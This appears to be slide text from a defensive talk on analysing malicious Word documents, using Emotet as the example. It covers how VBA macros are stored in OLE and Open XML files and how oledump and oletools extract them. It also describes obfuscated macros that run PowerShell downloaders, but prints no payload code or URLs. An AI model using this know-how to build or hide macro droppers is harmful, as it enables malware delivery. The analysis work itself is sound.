2. MALICIOUS WORD DOC ANALYSIS
EMOTET
▸ Attackers actively using word docs with obfuscated macros
▸ Macro runs a powershell script to download main
executable
3. MALICIOUS WORD DOC ANALYSIS
HOW MACROS ARE STORED?
▸ MS Office 97-2003 documents
▸ Microsoft Compound File
Binary (CFB) a.k.a OLE (Object
Linking and Embedding)
▸ Like a filesystem
▸ Consists of segments called
streams
▸ VBA Storage contains the
source code as compressed
https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
4. MALICIOUS WORD DOC ANALYSIS
HOW MACROS ARE STORED?
▸ MS Office 2007+ documents
▸ MS Open XML format
▸ XML Files in a ZIP archive
▸ Macros are stored in a
binary OLE file within ZIP
archive called
“vbaProject.bin”
5. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/oledump-py/
python oledump.py DOC_NAME
▸ oletools: https://github.com/decalage2/oletools
sudo -H pip install -U oletools
▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and
OpenXML).
▸ olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
view and extract individual data streams.
▸ olemeta: to extract all standard properties (metadata) from OLE files.
▸ oletimes: to extract creation and modification timestamps of all streams and storages.
▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
▸ olemap: to display a map of all the sectors in an OLE file.
6. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oletools: https://github.com/decalage2/oletools
▸ olevba: to extract and analyze VBA Macro source code
from MS Office documents (OLE and OpenXML).
7. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/
oledump-py/
8. MALICIOUS WORD DOC ANALYSIS
EXTRACT CMD / POWERSHELL FROM VBA SCRIPT
▸ There is going to be a lot of
▸ Unused benign code
▸ Junk code
▸ Obfuscation
▸ String replacements
▸ Powershell code will be the downloader
▸ Download URLs will be obfuscated